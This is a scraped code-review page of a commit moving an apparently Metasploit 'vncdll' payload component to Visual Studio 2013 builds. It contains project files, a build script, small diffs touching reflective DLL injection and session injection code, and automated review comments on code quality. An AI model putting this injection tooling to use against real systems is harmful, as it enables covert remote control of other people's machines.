Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
TargetEnvironment="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="0"
|
|
||||||
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
|
|
||||||
MinimalRebuild="true"
|
|
||||||
BasicRuntimeChecks="3"
|
|
||||||
RuntimeLibrary="3"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
LinkIncremental="2"
|
|
||||||
GenerateDebugInformation="true"
|
|
||||||
SubSystem="2"
|
|
||||||
TargetMachine="17"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Release|Win32"
|
|
||||||
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
UseOfMFC="1"
|
|
||||||
CharacterSet="2"
|
|
||||||
WholeProgramOptimization="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="2"
|
|
||||||
EnableIntrinsicFunctions="true"
|
|
||||||
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
RuntimeLibrary="0"
|
|
||||||
EnableFunctionLevelLinking="true"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
CompileAs="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
PreprocessorDefinitions="_X86_"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
|
|
||||||
OutputFile="release\vncdll.dll"
|
|
||||||
LinkIncremental="1"
|
|
||||||
GenerateManifest="false"
|
|
||||||
GenerateDebugInformation="false"
|
|
||||||
SubSystem="2"
|
|
||||||
OptimizeReferences="2"
|
|
||||||
EnableCOMDATFolding="2"
|
|
||||||
RandomizedBaseAddress="1"
|
|
||||||
DataExecutionPrevention="1"
|
|
||||||
TargetMachine="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
CommandLine="copy /y "release\vncdll.dll" "..\output\""
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Release|x64"
|
|
||||||
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
UseOfMFC="1"
|
|
||||||
CharacterSet="2"
|
|
||||||
WholeProgramOptimization="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
TargetEnvironment="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="2"
|
|
||||||
EnableIntrinsicFunctions="true"
|
|
||||||
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
RuntimeLibrary="0"
|
|
||||||
EnableFunctionLevelLinking="true"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
CompileAs="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
PreprocessorDefinitions="_X64_"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
|
|
||||||
OutputFile="release\vncdll.x64.dll"
|
|
||||||
LinkIncremental="1"
|
|
||||||
GenerateManifest="false"
|
|
||||||
GenerateDebugInformation="false"
|
|
||||||
SubSystem="2"
|
|
||||||
OptimizeReferences="2"
|
|
||||||
EnableCOMDATFolding="2"
|
|
||||||
RandomizedBaseAddress="1"
|
|
||||||
DataExecutionPrevention="1"
|
|
||||||
TargetMachine="17"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
CommandLine="copy /y "release\vncdll.x64.dll" "..\output\""
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
</Configurations>
|
|
||||||
<References>
|
|
||||||
</References>
|
|
||||||
<Files>
|
|
||||||
<Filter
|
|
||||||
Name="Source Files"
|
|
||||||
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
|
|
||||||
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\context.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<Filter
|
|
||||||
Name="rdi"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\LoadLibraryR.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveLoader.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="core"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\inject.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ps.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\session.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="Header Files"
|
|
||||||
Filter="h;hpp;hxx;hm;inl;inc;xsd"
|
|
||||||
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\context.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<Filter
|
|
||||||
Name="rdi"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\LoadLibraryR.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveDLLInjection.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveLoader.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="core"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\inject.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ps.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\session.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="Resource Files"
|
|
||||||
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
|
|
||||||
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.rc"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Files>
|
|
||||||
<Globals>
|
|
||||||
</Globals>
|
|
||||||
</VisualStudioProject>
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
@ECHO OFF
|
||||||
|
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
|
||||||
|
|
||||||
|
IF "%1"=="x86" GOTO BUILD_X86
|
||||||
|
IF "%1"=="X64" GOTO BUILD_X64
|
||||||
|
|
||||||
|
ECHO "Building VNCDLL x64 and x86 (Release)"
|
||||||
|
SET PLAT=all
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X86
|
||||||
|
ECHO "Building VNCDLL x86 (Release)"
|
||||||
|
SET PLAT=x86
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X64
|
||||||
|
ECHO "Building VNCDLL x64 (Release)"
|
||||||
|
SET PLAT=x64
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:RUN
|
||||||
|
PUSHD workspace
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
|
||||||
|
GOTO :END
|
||||||
|
|
||||||
|
:NEED_VS
|
||||||
|
ECHO "This command must be executed from within a Visual Studio Command prompt."
|
||||||
|
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
|
||||||
|
|
||||||
|
:END
|
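Review bot: The platform test on the `IF "%1"=="X64"` line is case-sensitive in cmd, so invoking the script with the lowercase `x64` that the ECHO text and the make.msbuild `<Target Name="x64">` both use falls through to the all-platforms build; the two comparisons also disagree with each other on case. Use the case-insensitive form for both: `IF /I "%1"=="x86" GOTO BUILD_X86` and `IF /I "%1"=="x64" GOTO BUILD_X64`. The msbuild.exe result is also not propagated: after POPD the script reaches `GOTO :END` whatever the build outcome, so a caller cannot tell a failed build from a successful one; testing ERRORLEVEL after the msbuild.exe line and exiting non-zero on failure would close that gap.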
|
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\vncdll.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building VNCDLL x86 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building VNCDLL x64 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
30
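--- a/external/source/vncdll/winvnc/vncdll.sln
+++ b/external/source/vncdll/vncdll.sln
@@ -1,11 +1,10 @@
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
 EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
-ProjectSection(ProjectDependencies) = postProject
-{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
-EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
 EndProject
 Global
 GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -15,19 +14,22 @@ Global
 Release|x64 = Release|x64
 EndGlobalSection
 GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
+{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
-{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
+{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
+{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
-{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
 EndGlobalSection
 GlobalSection(SolutionProperties) = preSolution
 HideSolutionNode = FALSE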
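--- a/external/source/vncdll/loader/context.c
+++ b/external/source/vncdll/vncdll/context.c
@@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
 {
 do
 {
-_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
+_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
 
 dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
 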
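Review bot: The new `_snprintf_s` call passes `MAX_PATH - 1` as count and still discards the return value, so as I read the secure-CRT contract an over-long result would be treated as an invalid parameter (buffer emptied, handler invoked) rather than silently truncated. With `%08X` of a DWORD the output is a fixed 17 characters, so it cannot trigger here, but the intent should be explicit: either `_snprintf_s( cNamedPipe, MAX_PATH, _TRUNCATE, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );` or a comment such as `// pipe name is fixed-width (17 chars); cannot exceed MAX_PATH`. The enclosing context_message_thread starts outside the hunk.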
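--- a/external/source/vncdll/loader/inject.c
+++ b/external/source/vncdll/vncdll/inject.c
@@ -1,7 +1,7 @@
 #include "loader.h"
 #include "ps.h"
 #include "inject.h"
-#include "LoadLibraryR.h"
+#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
 #include <Tlhelp32.h>
 
 // Simple trick to get the current meterpreters arch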
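Review bot: The replaced include hard-codes a `../../ReflectiveDLLInjection/inject/src/` path into the source file, tying inject.c to one checkout layout, while the new vcxproj already expresses the sibling tree through AdditionalIncludeDirectories (`..\..\ReflectiveDLLInjection\common`). Adding `..\..\ReflectiveDLLInjection\inject\src` to that property and keeping `#include "LoadLibraryR.h"` would keep the source portable and the path in one place. Minor, but the same relative-path pattern is repeated by loader.c's include of ReflectiveLoader.c.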
5
external/source/vncdll/loader/loader.c → external/source/vncdll/vncdll/loader.c
vendored
Normal file → Executable file
|
@ -5,11 +5,12 @@
|
||||||
#include "ps.h"
|
#include "ps.h"
|
||||||
#include "session.h"
|
#include "session.h"
|
||||||
#include "inject.h"
|
#include "inject.h"
|
||||||
#include "ReflectiveLoader.h"
|
|
||||||
|
|
||||||
#define VNCFLAG_DISABLECOURTESYSHELL 1
|
#define VNCFLAG_DISABLECOURTESYSHELL 1
|
||||||
#define VNCFLAG_DISABLESESSIONTRACKING 2
|
#define VNCFLAG_DISABLESESSIONTRACKING 2
|
||||||
|
|
||||||
|
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
/*
|
/*
|
||||||
* The HINSTANCE of this injected dll.
|
* The HINSTANCE of this injected dll.
|
||||||
*/
|
*/
|
||||||
|
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
|
||||||
|
|
||||||
hAgentProcess = hProcess;
|
hAgentProcess = hProcess;
|
||||||
|
|
||||||
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
|
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
|
||||||
|
|
||||||
} while( 0 );
|
} while( 0 );
|
||||||
|
|
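Review bot: The first hunk replaces the local ReflectiveLoader copy with a textual `#include` of the shared `ReflectiveLoader.c`, but nothing in the hunk defines `REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` or `REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN`, which the deleted local copy set before its loader body. If neither the shared file nor loader.h defines them (loader.h is outside this hunk, so I cannot confirm), the included unit would compile the stub-style `ReflectiveLoader( VOID )` signature and its own DllMain alongside this file's. Placing `#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` and `#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN` directly above the include, or a comment naming where they are set, would make the dependency explicit. The second hunk's loader_inject_pre starts outside the hunk.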
|
@ -0,0 +1,18 @@
|
||||||
|
|
||||||
|
#ifdef _X64_
|
||||||
|
|
||||||
|
#ifdef _DEBUG
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
|
||||||
|
#else
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#else
|
||||||
|
|
||||||
|
#ifdef _DEBUG
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
|
||||||
|
#else
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#endif
|
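--- a/external/source/vncdll/loader/session.c
+++ b/external/source/vncdll/vncdll/session.c
@@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
 {
 if( !pProcessIdToSessionId )
 {
-hKernel = LoadLibrary( "kernel32.dll" );
+hKernel = LoadLibraryA( "kernel32.dll" );
 if( hKernel )
 pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
 }
@@ -53,7 +53,7 @@ DWORD session_activeid()
 {
 if( !pWTSGetActiveConsoleSessionId )
 {
-hKernel = LoadLibrary( "kernel32.dll" );
+hKernel = LoadLibraryA( "kernel32.dll" );
 if( hKernel )
 pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
 }
@@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
 CloseHandle( hToken );
 }
 
-hKernel = LoadLibrary( "kernel32" );
+hKernel = LoadLibraryA( "kernel32" );
 if( !hKernel )
 break;
 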
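Review bot: The three converted call sites name the module inconsistently: `"kernel32.dll"` in session_id and session_activeid but `"kernel32"` in session_inject (last hunk). Both resolve to the same already-loaded module, but using the explicit file name everywhere, `hKernel = LoadLibraryA( "kernel32.dll" );`, avoids relying on the loader's default-extension rule and keeps the three sites grep-consistent. Each enclosing function starts outside its hunk.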
|
@ -0,0 +1,245 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
|
||||||
|
<RootNamespace>vncdll</RootNamespace>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
